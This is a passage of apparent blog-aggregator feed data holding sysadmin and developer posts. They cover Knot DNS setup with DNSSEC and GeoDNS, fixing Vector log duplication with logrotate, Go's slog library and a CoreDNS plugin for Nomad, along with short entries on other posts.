(\n        YYYYMMDD01  ;Serial\n        14400       ;Refresh\n        3600        ;Retry\n        1209600     ;Expire\n        3600        ;Negative response caching TTL\n)\n@   IN  NS  ns1.your.domain.\n@   IN  NS  ns2.your.domain.\nns1 A   your.main.servers.ip\nns2 A   your.other.servers.ip\n@   A   your.main.servers.ip\n\n; PTR Records (for mailservers)\nyour.ip.in.reverse.in-addr.arpa.    PTR mail.your.domain.\nAt this point, you can run systemctl restart knot\n(restart since its a major change) on both nodes.\nUpdating the zonefile\nUpdating the zonefile is not hard.\nSince we set the zonefile-load to\ndifference-no-serial, we do not need to increment the\nserial as it will automatically be computed when\nknotc reload is run.\nAll records must be before the PTR in the zonefile.\nWildcards can be done with the hostname as *\nIf the hostname ends with ., it must include your.domain, that is\nsomething.your.domain will be something.your.domain.\nIf the hostname does not end with a ., it is relative to the domain,\nthat is something.your.domain will just be something.\nAlways use tabs, not spaces.\nToken-based zonefile\nauthentication\nAt the moment, the authentication for sending and receiving the\nzonefile is completely based on the IP address, which is not very\nsecure.\nTo remediate this, we can use token-based authentication.\nFirst, you need to generate a key with\nkeymgr -t zonesync hmac-sha256\nThis is the key that will authenticate the zone transfers.\nYou can copy-paste the output it gives you into your knot.conf, above\nthe remote section on both master and slave.\nNow, you need to add key: zonesync to the remote,\nacl_primary\u002Fsecondary sections on both master and slave.\nAt this point, you can run systemctl restart knot, and\nall the syncs will be more secure!\nDNSSEC\nDNSSEC is an extension to DNS designed to protect applications using\nDNS from accepting forged or manipulated DNS data by using zone\nsigning.\nEnabling DNSSEC on knot is as simple as adding the following line to\nthe template section:\ntemplate:\n    ...\n    dnssec-signing: on\n    ...\nAt this point, you need to upload the DS record to your Registry.\nThis is usually done through your registrar’s WebUI.\nThe DNSSEC-enabled DNS servers use the DS record from your domain\nregistry to validate your records.\nYou can get your DS record with the following command:\nkeymgr your.domain ds\n\nThe output will look something like this:\n54674 13 2 E28E3DB78E5517A577353A43799AD14EC044720BAE4906D134F5EA40 74AC0287\nIn the example given:\nKey tag - 54674\nAlgorithm - 13\nDigest Type - 2\nDigest - E28E3…287 (omit space)\nOn namecheap, you add this at Advanced DNS -> DNSSEC\nYou can check if your DNSSEC is working properly at DNSViz and DNSSEC-Analyzer.\nRFC2136\nRFC2136 is an\nRFC that allows dynamic updates for DNS.\nThis works completely over DNS and does not require a special\nAPI.\nTo set it up, you need to create an ACL as follows:\nacl:\n    ...\n    - id: acl_dynupdates\n    address: [an.authorized.ip.addr, another.authorized.ip.addr]\n    action: update\n...\nzone:\n  - domain: your.domain\n    notify: secondary\n    acl: [acl_secondary, acl_dynupdates]\nYou can also add token-based auth by generating another key with\nkeymgr -t rfc2136 hmac-sha256\nYou can add it to the config as follows:\nkey:\n    ...\n    - id: rfc2136\n    algorithm: hmac-sha256\n    secret: xxx\n...\nacl:\n    ...\n    - id: acl_dynupdates\n    address: [an.authorized.ip.addr, another.authorized.ip.addr]\n    action: update\n    key: 
rfc2136\nAfter this, you can run systemctl restart knot to apply\nthe changes.\nCaddy\nCaddy is a modern webserver\nwhich supports automatic cert generation from letsencrypt\u002Fzerossl with\nacme.\nIt uses http-01 for the challenge by default, but can use a dns\nchallenge too.\nFor the DNS challenge, you first need to install the RFC2136 DNS plugin with\nthe following command:\nxcaddy build --with github.com\u002Fcaddy-dns\u002Frfc2136@master\n\nNow, add the following lines to the top of your Caddyfile:\n{\n    acme_dns rfc2136 {\n        key_name \"rfc2136\"\n        key_alg \"hmac-sha256\"\n        key \"xxx\"\n        server \"your.main.servers.ip:53\"\n    }\n    acme_ca https:\u002F\u002Facme-v02.api.letsencrypt.org\u002Fdirectory\n}\nNow, all certs can be generated using the DNS challenge!\nThis is especially useful in a GeoDNS environment.\nGeoDNS\nGeoDNS allows geographical split horizon based on a GeoIP database,\nsuch as Maxmind’s free GeoLite2.\nFirstly, you need to procure the GeoLite2 database from Maxmind.\nDue to policy changes, you now need to sign up on Maxmind’s website in\norder to get access.\nHowever, older GeoIP DBs can still be found in many places, including\ndistribution package repositories.\nOnce you procure your copy of GeoLite2, you need to install the GeoIP\nmodule for knot-dns on both master and slave.\nOn Debian, the package’s name is knot-module-geoip.\nAfter installing the module, you can add it to the knot.conf (it must be\nbefore the zone section, however):\nmod-geoip:\n  - id: geo \n    config-file: \"\u002Fetc\u002Fknot\u002Fgeo.conf\"\n    mode: geodb\n    geodb-file: \"\u002Fvar\u002Flib\u002Fknot\u002FGeoLite2-City.mmdb\"\n    geodb-key: [ continent\u002Fcode, country\u002Fiso_code, city\u002Fnames\u002Fen ]\nYou also need to include the GeoIP module for your domain. You can do\nthat by adding this line to your domain’s zone section:\nzone:\n    - domain: your.domain\n      ...\n      module: mod-geoip\u002Fgeo\nNow, you need to configure the GeoDNS.\nTo do so, create a file called \u002Fetc\u002Fknot\u002Fgeo.conf with\nthe following:\ngeodnsubdom.your.domain:\n  - geo: \"*;*;*\" # Fallback in case DNS server doesn't send ECS\n    A: your.main.servers.ip\n    TXT: \"Worldwide\"\n  - geo: \"EU;*;*\" # Europe\n    A: your.europe.servers.ip\n    TXT: \"Europe\"\n    ...\nHowever, the file needs to be manually synced to the slave on every\nupdate.\nIt is also painful to use if you have multiple root subdomains you\nwant to use GeoDNS with.\nDue to these reasons, I made a kinda hacky script to remediate\nthis:\n#!\u002Fusr\u002Fbin\u002Fenv bash\ngeoconf=\u002Fetc\u002Fknot\u002Fgeo.conf\nremote='geodns@other.servers.ip'\nprintf '' > $geoconf\nfor i in $(\u003C\u002Fetc\u002Fknot\u002Fgeodnsdomains); do\n    cat \u002Fetc\u002Fknot\u002Fgeodnstemplate >> $geoconf\n    sed -i \"s\u002FREPLACEME\u002F${i}\u002F\" $geoconf\ndone\nscp $geoconf \"${remote}\":\u002Fvar\u002Fgeo.conf\nssh $remote \"sudo systemctl restart knot\"\nsystemctl restart knot\n\nIn order to allow the unprivileged user on the slave to restart knot,\nI used a sudo ALLOW_CMDS flag:\nCmnd_Alias KNOT_CMDS = \u002Fusr\u002Fbin\u002Fsystemctl restart knot\ngeodns ALL=(ALL) NOPASSWD: KNOT_CMDS\nAnd that's it. 
Thanks for reading!",[1368],"2023\u002F03\u002F01\u002F3",{"slug":1370,"title":1371,"link":1372,"pubDate":1373,"contentSnippet":1374,"tags":1375,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"blog-open-source-sustainability","The complicated road to Open Source Sustainability","https:\u002F\u002Fwww.divyamohan.com\u002Fblog-open-source-sustainability\u002F","Sat, 18 Feb 2023 13:55:22 GMT","Overworked maintainers & understaffed projects are the foundations that open source and, thereby, most of your daily drivers are built on. Corporate open source customers need to be better citizens in order to move towards a more sustainable model of open source.",[701,1233],{"slug":1377,"title":1378,"link":1379,"pubDate":1380,"contentSnippet":1381,"tags":1382,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"missing-duplicate-logs","The curious case of missing and duplicate logs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmissing-duplicate-logs\u002F","2023-02-16T08:27:13.000Z","At work, we use a Vector pipeline for processing and shipping logs to Clickhouse. We also self-host our SMTP servers and recently started using Haraka SMTP. While Haraka is excellent in raw performance and throughput, it needed an external logging plugin for audit and compliance purposes. I wrote haraka-plugin-outbound-logger to log basic metadata like timestamps\u002Fsubject\u002FSMTP response in a JSON file.\nThe plan was to dump these logs into a file and use Vector’s file source for reading them and doing further transformations. However, things went differently than I had planned. There were mainly two issues that cropped up due to bad Vector configuration.\nMissing logs#\nThe vector configuration to read the file looked like this:\n[sources.outbound_logger]\ntype = \"file\"\ninclude = [\"\u002Fvar\u002Flog\u002Fharaka\u002Foutbound\u002F*.log\"]\nread_from = \"beginning\"\n# Remove the files after 24 hours. Vector must have permission to delete these files.\nremove_after_secs = 86400\nfingerprint.strategy = \"device_and_inode\"\n\nVector has a handy configuration option to automagically delete the file if it hasn’t received any new writes in the configured time interval. So remove_after_secs=86400 specifies that if the file hasn’t had any new writes for 24h, Vector can delete it. It made sense to configure this because our workload was a short-lived process - a batch job done once every N days.\nWhen the file didn’t receive any new writes after 24h, vector deleted the file as expected. However, the plugin continued logging into the same file handle, even for newer batch jobs. 
As a result, the file didn’t receive any new logs and was empty.\nI created a minimal POC to reproduce this seemingly strange issue:\nvar pino = require('pino');\n\n\u002F\u002F Initialise pino js logger and inject in the plugin context.\nvar opts = {\n    name: 'outbound_logger',\n    level: 'debug',\n    \u002F\u002F uses the ISO time format.\n    timestamp: pino.stdTimeFunctions.isoTime,\n    formatters: {\n        level: (label) => {\n            return { level: label };\n        },\n    },\n}\n\npilog = pino(opts, pino.destination(`${__dirname}\u002Fapp.log`))\n\npilog.info('this is a first message')\nsetTimeout(() => pilog.info('this message should get logged'), 10000)\npilog.info('this message will be recorded as well')\nThis snippet logs to app.log.\n{\"level\":\"info\",\"time\":\"2023-02-16T06:45:04.031Z\",\"pid\":206573,\"hostname\":\"pop-os\",\"name\":\"outbound_logger\",\"msg\":\"this is a first message\"}\n{\"level\":\"info\",\"time\":\"2023-02-16T06:45:04.031Z\",\"pid\":206573,\"hostname\":\"pop-os\",\"name\":\"outbound_logger\",\"msg\":\"this message will be recorded as well\"}\n\nDuring the 10s time interval, I deleted the file from the disk with rm app.log to mimic the behaviour of remove_after_secs. I expected the file to get re-created and the “this message should get logged” line to be written by the above script.\nHowever, that didn’t happen. The script didn’t complain about a missing file, either. I was perplexed and did some google-fu and found the following via Stackoverflow:\nThe writes actually do not fail. When you delete a file that is open in another program you are deleting a named link to that file’s inode. The program that has it open still points to that inode. It will happily keep writing to it, actually writing to disk. Only now you don’t have a way to look at it, because you deleted the named reference to it. (If there were other references, e.g. hard links, you would still be able to!).\nThis is exactly what was happening in production. When vector deleted the file (as configured via remove_after_secs), the plugin didn’t know about it and kept writing to the same inode. This was a major TIL moment for me.\nFix: The fix was simple enough; I removed remove_after_secs from Vector’s config. To prevent the file from growing unbounded forever, I created a logrotate config:\n\u002Fopt\u002Fapp\u002Flogs\u002Fapp.log {\n    daily\n    rotate 15\n    dateext\n    dateformat -%Y-%m-%d.log\n    delaycompress\n    compress\n    notifempty\n    missingok\n    copytruncate\n}\nSome notes:\ncopytruncate is useful in this context. It copies the existing file to a new one, which now becomes a stale one. The current (active) file will be truncated to zero bytes. E.g., if app.log is rotated, logrotate will copy the file to a new file app-2023-02-05.log and then truncate the existing one to zero bytes. \ndelaycompress will not compress the logs until the next rotation happens. This is useful if vector hasn’t finished processing the log, as it can continue to do so.\nDuplicate Logs#\nNow, after fixing the case of missing logs, I found myself with the opposite problem - the logs were duplicated on Clickhouse.\nMy mental state at that moment couldn’t be more accurately described than by this meme:\n\nTo add more context, before developing my plugin for logging email delivery in Haraka, we used another plugin (acharkizakaria\u002Fharaka-plugin-accounting-files) to get these logs. This plugin records the metadata to CSV files. 
Still, there were some issues in properly escaping the subject lines (if the subject had a comma, it was incorrectly parsed); hence, the log file had inconsistent output. To address these issues, I figured writing another plugin from scratch that outputs a fixed JSON schema was better.\nVector’s file source was configured like the following for reading the CSV files. The only change here is that remove_after_secs is gone after fixing issue #1.\n[sources.outbound_logger]\ntype = \"file\"\ninclude = [\"\u002Fvar\u002Flog\u002Fharaka\u002Foutbound\u002F*.log\"]\nread_from = \"beginning\"\nfingerprint.strategy = \"device_and_inode\"\nVector “fingerprints” each file in the file source and keeps a checkpoint of how many bytes it has read per file in its own “disk buffer”. This buffer is helpful if Vector crashes, as it can restart reading the file from where it last stopped.\nThere are two strategies for fingerprinting that Vector uses:\nThe checksum strategy uses a CRC check on the first N lines of the file.\nThe device_and_inode strategy uses the file’s actual inode on disk to identify it uniquely.\nAs I was using a different plugin which logged to a CSV file, the checksum strategy did not work in my context. Since Vector fingerprints the first few bytes (usually just enough for the header of a CSV), all the CSV files on that disk would have the same fingerprint, and Vector would not read all of them. To work around this, I changed fingerprint.strategy = \"device_and_inode\" so Vector uniquely identifies all CSV files by their inode. (In hindsight, I should have just used checksum with a higher fingerprint.lines value.)\nThe mistake this time was that when I switched to a JSON log file, I continued with the device_and_inode strategy. This isn’t a problem if there is no log rotation setup. Since I did configure logrotate to fix issue #1, as you would have guessed, copytruncate created another log file, and because I was using the device_and_inode strategy, Vector thought this was a “new” file to be watched and processed. So now I had duplicate entries from this new file, which is technically just an older log-rotated file.\nThe fix:\n[sources.outbound_logger.fingerprint]\nlines = 14\nstrategy = \"checksum\"\nignored_header_bytes = 2048\nI switched back to the default checksum strategy and adjusted the thresholds for lines\u002Fheader bytes to account for JSON logs. The same is documented very clearly in Vector’s docs, and it was my RTFM moment:\nThis strategy avoids the common pitfalls associated with using device and inode names since inode names can be reused across files. This enables Vector to properly tail files across various rotation strategies.\nPhew! I am glad that, after these fixes, Vector is durably and reliably processing all the logs, and logrotate is happily working in conjunction as well. I hope documenting my learnings from these production issues will help someone with the same problems.\nFin!",[],{"slug":1384,"title":1385,"link":1386,"pubDate":1387,"contentSnippet":1388,"tags":1389,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"structured-logging-in-go-with-slog","Structured logging in Go with slog","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fstructured-logging-in-go-with-slog\u002F","2023-02-15T07:29:53.000Z","A few months ago, a proposal for adding a structured logging library in Go was introduced by Jonathan Amsterdam. At present, Go has a minimal and bare-bones log package which works all right for basic use cases.
However, the current library has a few shortcomings that this proposal aims to solve:\nNo way to emit logs with different severities\u002Flevels.\nNo structured output, which makes parsing of logs harder.\nNo way to log a set of common fields\u002Fattributes.\nIt’s difficult to have a log object inside libraries, as each service could have its own log implementation.\nAs a result, many code bases have their own wrappers around the log package. Additionally, there are plenty of 3rd party libraries to choose from - including logf (which my work colleagues and I built at Zerodha).\nThis article is about how to get started with slog for logging in Go applications.\nNOTE\n    \nSince slog is currently in the proposal state and hasn’t yet been merged into the official library, the API could change in future.\nArchitecture of slog#\nAt a high level, slog contains three main entities:\nLogger: The user-facing API for interacting with slog. All the public methods are defined on the Logger object.\nRecord: Contains information about the log event itself. A standard record will have timestamp, level and message fields by default. Additional attributes and metadata like caller info can be added to the Record.\nHandlers: A handler is an interface implementation. The Logger object passes the Record to a handler, and the handler can choose whatever it wants to do with the Record. This is a common approach in Go libraries, where a “provider” handling a task can be abstracted behind an interface. Currently, slog ships with two handlers: JSON and logfmt. Some projects have also created handlers for zap\u002Flogrus (popular 3rd party libraries).\nInitialization#\nThis snippet initializes a Text Handler, which produces logfmt format messages on os.Stdout.\npackage main\n\nimport (\n\t\"os\"\n\n\t\"golang.org\u002Fx\u002Fexp\u002Fslog\"\n)\n\nfunc main() {\n\tlog := slog.New(slog.NewTextHandler(os.Stdout))\n\tlog.Info(\"Hello world\")\n\n\tfakeErr := os.ErrNotExist\n\tlog.Error(\"something went wrong\", fakeErr, \"file\", \"\u002Ftmp\u002Fabc.txt\")\n}\n\nLog output:\ntime=2023-02-15T19:58:10.615+05:30 level=INFO msg=\"Hello world\"\ntime=2023-02-15T19:58:10.615+05:30 level=ERROR msg=\"something went wrong\" file=\u002Ftmp\u002Fabc.txt err=\"file does not exist\"\nCustomizing#\nYou’ll notice that the caller information isn’t exposed by default. The reason could be that finding the stack trace of the calling line is a somewhat expensive operation. However, libraries\u002Fapps which need it can enable it by customizing the handler:\nfunc main() {\n\thandler := slog.HandlerOptions{AddSource: true}\n\tlog := slog.New(handler.NewTextHandler(os.Stdout))\n\n\tlog.Info(\"Hello world\")\n}\n\nLog Output:\ntime=2023-02-15T12:17:53.742+05:30 level=INFO source=\u002Fhome\u002Fkaran\u002FCode\u002FPersonal\u002Fslog-examples\u002Fmain.go:14 msg=\"Hello world\"\nAttributes#\nSometimes, it’s helpful to append specific metadata to each log line, which helps in aggregating\u002Ffiltering with a central log-collecting agent. E.g., you can export a component key for each sub-service of your primary application.\nfunc main() {\n\tlog := slog.New(slog.NewTextHandler(os.Stdout)).With(\"component\", \"demo\")\n\tlog.Info(\"Hello world\")\n}\n\nLog Output:\ntime=2023-02-15T12:21:50.231+05:30 level=INFO msg=\"Hello world\" component=demo\nNested Keys#\nSo far, we’ve seen flat keys in the log message. It may be helpful to group specific keys together and form a nested object. In JSON, that would mean a top-level object with different fields inside.
However, in logfmt, it would be a parent.child format. To use nested keys, slog.Group can be used. This example uses http as the top-level key, and all its associated fields will be nested inside.\n\tlog.Info(\"Hello world\", slog.Group(\"http\",\n\t\tslog.String(\"method\", \"GET\"),\n\t\tslog.Int(\"status\", 200),\n\t\tslog.Duration(\"duration\", 250),\n\t\tslog.String(\"path\", \"\u002Fapi\u002Fhealth\")))\n\ntime=2023-02-15T12:30:43.130+05:30 level=INFO msg=\"Hello world\" component=demo http.method=GET http.status=200 http.duration=250ns http.path=\u002Fapi\u002Fhealth\nConfigurable Handlers#\nJSON logs are daunting and tedious to read when locally developing applications. However, they’re a great fit for machine parsing of the logs. logfmt hits the sweet spot of being both machine-parseable and human-readable. However, thanks to the powerful “interface” implementation approach, it’s easy to switch to any handler via user-configurable methods (like config files\u002Fenv variables):\npackage main\n\nimport (\n\t\"os\"\n\n\t\"golang.org\u002Fx\u002Fexp\u002Fslog\"\n)\n\nfunc main() {\n\tvar (\n\t\tenv     = os.Getenv(\"APP_ENV\")\n\t\thandler slog.Handler\n\t)\n\n\tswitch env {\n\tcase \"production\":\n\t\thandler = slog.NewJSONHandler(os.Stdout)\n\tdefault:\n\t\thandler = slog.NewTextHandler(os.Stdout)\n\t}\n\n\tlog := slog.New(handler)\n\tlog.Info(\"Hello world\")\n}\n\n$ go run main.go\ntime=2023-02-15T12:39:45.543+05:30 level=INFO msg=\"Hello world\"\n$ APP_ENV=production go run main.go\n{\"time\":\"2023-02-15T12:39:53.523477544+05:30\",\"level\":\"INFO\",\"msg\":\"Hello world\"}\n\nSummary#\nslog is an excellent proposal, and it’s high time Go gets its official structured logging library. The API is designed to be easy to use, and a clear path is given for users wanting high performance\u002Fzero allocations by creating their own handlers and making those performance improvements.\nFin",[],{"slug":1391,"title":1392,"link":1393,"pubDate":1394,"contentSnippet":1395,"tags":1396,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-24","Bad Matrix","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fbad-matrix\u002Findex.html","Tue, 14 Feb 2023 00:00:00 +0000","A while ago, someone in the Recurse Center nerdiverse decided we needed a \"Bad Print\". They made one. Things escalated.
Bad Matrix happened.",[49,1397],"bash",{"slug":1399,"title":1400,"link":1401,"pubDate":1402,"contentSnippet":1403,"tags":1404,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"00-welcome-html","Welcome to my new blog!","https:\u002F\u002Faryak.me\u002Fblog\u002F00-welcome.html","Sat, 28 Jan 2023 12:39:46 +0000","Hello everybody.\nWelcome to my new blog!\nI created this along with my website redesign and conversion to\npandoc from static html.\nI will try to write based content at least once a month but no\npromises :P",[1405],"2023\u002F01\u002F28\u002F6",{"slug":1407,"title":1408,"link":1409,"pubDate":1410,"contentSnippet":1411,"tags":1412,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-25","Riff: Classifying Tools for Thought","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Ftools-for-thought\u002Findex.html","Thu, 19 Jan 2023 00:00:00 +0000","Trying out a classification for \"Tools for Thought\" as a means of augmenting the human intellect, hot on the heels of recent community conversations about ChatGPT, CoPilot, Stable Diffusion etc...",[55,49,244,245,246],{"slug":1414,"title":1415,"link":1416,"pubDate":1417,"contentSnippet":1418,"tags":1419,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"backstory-behind-prav-app-project","Backstory Behind Prav Project","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fbackstory-behind-prav-app-project\u002F","Wed, 18 Jan 2023 21:02:40 +0530","In 2020, I uninstalled WhatsApp due to its proprietary nature and being backed by a surveillance company. In my quest to find alternatives, I came across many messengers, before finally settling on Matrix and XMPP, both of which are decentralized chat protocols built on freedom-respecting software.\nBut chat applications are only as good as the number of people using them, and it was not easy to onboard people to XMPP or Matrix.\nCreating an account on either of them requires installing an app, followed by choosing a server, a username, and a password. This onboarding process is relatively difficult compared to more commonly-known messengers like WhatsApp and Telegram. It was suitable for privacy-conscious users, but not for the majority of people who are not so privacy-conscious, or who just found it too much effort to invest in a new app.\nAt some point, Praveen (of FSCI fame) introduced me to Quicksy - an XMPP client which provides two features found in WhatsApp -\neasier registration, allowing users to register by entering a phone number and an OTP;\neasier contact discovery, which automatically adds people to your Quicksy contact list if you have their phone number in your phone book.\nThese made onboarding easier, and I was successfully able to use Quicksy to onboard users.\nAt the time, we were also running our own XMPP services at poddery.com and disap.in. These services were run by volunteers, and there had been instances where it took us months to fix something.\nFurther, we found that the XMPP clients weren’t consistent in their features across platforms. For example, Kaidan didn’t have OMEMO encryption, while Gajim didn’t support calls. So, if a user wants to use a desktop client to make XMPP calls, they need to figure out that they have to install Dino (which is only available on GNU\u002FLinux).
Having a consistent brand across all platforms helps newbies, as it might be hard for them to wrap their head around using Dino to talk to Conversations.\nOne day, when Praveen’s friend installed Quicksy to share pictures with him, the friend gave him the idea to make a business out of it. Praveen also thought it would be better to market our own XMPP service rather than Quicksy, giving us more control over the privacy policy and service operations. This is when he asked me if I would like to get involved, to which I immediately agreed.\nPraveen had many years of experience running XMPP services, albeit in a volunteer setting. He thought of experimenting with paid sysadmins rather than volunteers. This is how the Prav project was born. The phone number and contact discovery part was inspired by the Quicksy app, and the idea of consistent branding across platforms was inspired by Snikket. We also added the idea of making it subscription-based, which can help us fund sysadmins and allocate funds towards marketing.\nA few months later, we decided to make it a cooperative so that the decision-making is democratic (one person, one vote, as opposed to companies in which each person has voting power proportional to the number of shares they hold). Nagarjuna proposed we run a beta service to attract people to pledge the cooperative membership. This gave birth to our beta app and service.\nFree software gives users the freedom to adapt the software - but in practice, only programmers or resourceful entities like governments or corporations get to exercise this freedom. With the cooperative model of the Prav project, we want to empower members to collectively decide which features to implement, followed by raising funds for developers to implement them.\nI am excited to see how this experiment will turn out.",[],{"slug":1421,"title":1422,"link":1423,"pubDate":1424,"contentSnippet":1425,"tags":1426,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-26","Animating Text Art in JavaScript","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fanimate-text-art-javascript\u002Findex.html","Mon, 16 Jan 2023 00:00:00 +0000","It is with no small thanks to MDN, StackOverflow, Firefox's support for countless open tabs, JavaScript's support for first-class functions, and first-class supportive colleagues, I learned it is possible for a web front end novice to program \"text art animations\". Whatever that is even. Because I thoroughly enjoyed doing just that for Hanukkah of Data 2022. Here's how it went down.",[1427,1428,1429,888,1430,1431,456,533,457],"hanukkah_of_data","text_art","design","frontend","javascript",{"slug":1433,"title":1434,"link":1435,"pubDate":1436,"contentSnippet":1437,"tags":1438,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"coredns-nomad","Building a CoreDNS plugin","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcoredns-nomad\u002F","2023-01-04T18:30:00.000Z","CoreDNS is an extensible DNS server (which is actually a fork of Caddy v1) that can be used to serve DNS records for a domain. It is written in Go and is very easy to extend. It has a plugin system that allows you to write your own plugins to extend its functionality. In this post, I will be writing a plugin for CoreDNS that will allow it to serve DNS records for Nomad services.\nI recently came across a niche use case which required me to use a resolver address for querying Nomad services.
Currently, Nomad-native service discovery is only possible via consul-template (which renders a static block of addresses\u002Fports of services) and the HTTP API. I felt adding a DNS interface would be a nice add-on.\nRather than implementing all the boring crux of a DNS server, it’s better to extend an existing server. CoreDNS fits in well here; it’s also used by K8s for service discovery. CoreDNS has an extensible plugin system which allows you to chain multiple different plugins for handling a request. Stuff like logs\u002Fmetrics\u002Fcaching comes for free with CoreDNS in the form of plugins.\nCoreDNS docs have a handy guide on how to write a plugin from scratch, so I won’t cover that again here. These are just my short notes on how I locally developed and tested the plugin, and some problems I encountered during the process.\nDeveloping the plugin#\nFirstly, you need to clone the CoreDNS repo. Then, using the example plugin provided, you can create a new repository for your own plugin.\nTo make CoreDNS aware of this plugin, you need to add it to the plugin.cfg file. This file is used by the build script to generate the plugin list. The order of plugins matters here as it defines how the request is handled. For example, if you want to log all the requests, you need to add the log plugin before your plugin.\nTo add an external plugin, this is the format used:\nnomad:github.com\u002Fmr-karan\u002Fcoredns-nomad\nHowever, since we are developing the plugin locally, we need to add a replace directive in the go.mod file to point to the local plugin directory.\nreplace github.com\u002Fmr-karan\u002Fcoredns-nomad => ..\u002F..\u002Fcoredns-nomad\nNext, you can run make in the coredns repository. It’ll build the binary and place it in the coredns directory. You can run this binary to test your plugin. To check if the plugin indeed exists in the binary, you can use the following command:\n.\u002Fcoredns -plugins | grep nomad\nHandling requests#\nThe ServeDNS function is used to handle the DNS request by the plugin. It takes a context.Context, a dns.ResponseWriter and a *dns.Msg as arguments. The dns.ResponseWriter is used to write the response back to the client. The ServeDNS function returns an int which is the status code of the response. The status code is used by the next plugin in the chain to determine if it should handle the request or not.\nSince the nomad plugin expects a query in the format service.namespace.nomad, it validates the query and extracts the service name and namespace from it. If the query is invalid, it returns a dns.RcodeServerFailure status code. If the query is valid, it queries the Nomad API for the service and returns the response.\nfunc (n Nomad) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) (int, error) {\n\tstate := request.Request{W: w, Req: r}\n\tqname := state.Name()\n\tqtype := state.QType()\n\n\t\u002F\u002F Split the query name with a `.` as the delimiter and extract namespace and service name.\n\t\u002F\u002F If the query is not for a Nomad service, return.\n\tqnameSplit := dns.SplitDomainName(qname)\n\tif len(qnameSplit) \u003C 3 || qnameSplit[2] != \"nomad\" {\n\t\treturn plugin.NextOrFailure(n.Name(), n.Next, ctx, w, r)\n\t}\n\tnamespace := qnameSplit[1]\n\tserviceName := qnameSplit[0]\n\n...\n\nThe plugin currently handles A, AAAA and SRV record requests.
Since A\u002FAAAA records can only contain an IP address, SRV records can be used to advertise the port number.\n\t\t\u002F\u002F Check the query type to format the appropriate response.\n\t\tswitch qtype {\n\t\tcase dns.TypeA:\n\t\t\tm.Answer = append(m.Answer, &dns.A{\n\t\t\t\tHdr: header,\n\t\t\t\tA:   addr,\n\t\t\t})\n\t\tcase dns.TypeAAAA:\n\t\t\tm.Answer = append(m.Answer, &dns.AAAA{\n\t\t\t\tHdr:  header,\n\t\t\t\tAAAA: addr,\n\t\t\t})\n\n...\n\nCaching#\nWhile some coredns plugins have in-built support for caching the records to avoid a lookup to the Nomad server every time (which can get expensive), I decided to skip the caching implementation. This is because coredns itself has a cache plugin which supports various options for controlling the cache. In my testing, just using this cache plugin was sufficient to avoid Nomad lookups each time a query came in.\nTesting the plugin#\nI created a fake HTTP test server and added the URI paths which the Nomad Go client uses to query the Nomad API. This way, I could test the plugin without having to run a Nomad cluster locally.\n\t\u002F\u002F Setup a fake Nomad server.\n\tnomadServer := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tswitch r.URL.Path {\n\t\tdefault:\n\t\t\tt.Errorf(\"Not implemented: %v\", r.URL.Path)\n\t\t\treturn\n\t\tcase \"\u002Fv1\u002Fservice\u002Fexample\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1.2.3.4\",\"Namespace\":\"default\",\"Port\":23202,\"ServiceName\":\"example\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Ffakeipv6\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1:2:3::4\",\"Namespace\":\"default\",\"Port\":8000,\"ServiceName\":\"fakeipv6\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Fmulti\":\n\t\t\tw.Write([]byte(`[{\"Address\":\"1.2.3.4\",\"Namespace\":\"default\",\"Port\":25395,\"ServiceName\":\"multi\"},{\"Address\":\"1.2.3.5\",\"Namespace\":\"default\",\"Port\":20888,\"ServiceName\":\"multi\"},{\"Address\":\"1.2.3.6\",\"Namespace\":\"default\",\"Port\":26292,\"ServiceName\":\"multi\"}]`))\n\t\tcase \"\u002Fv1\u002Fservice\u002Fnonexistent\":\n\t\t\tw.Write([]byte(`[]`))\n\t\t}\n\t}))\nUsage Example#\nHere are some examples of how this plugin works. The Corefile I’ve used is:\nnomad:1053 {\n    errors\n    debug\n    health\n    log\n    nomad {\n\t\taddress http:\u002F\u002F127.0.0.1:4646\n        ttl 10\n    }\n    prometheus :9153\n    cache 30\n}\nOn running coredns, it connects to a local Nomad agent which is running at http:\u002F\u002F127.0.0.1:4646.
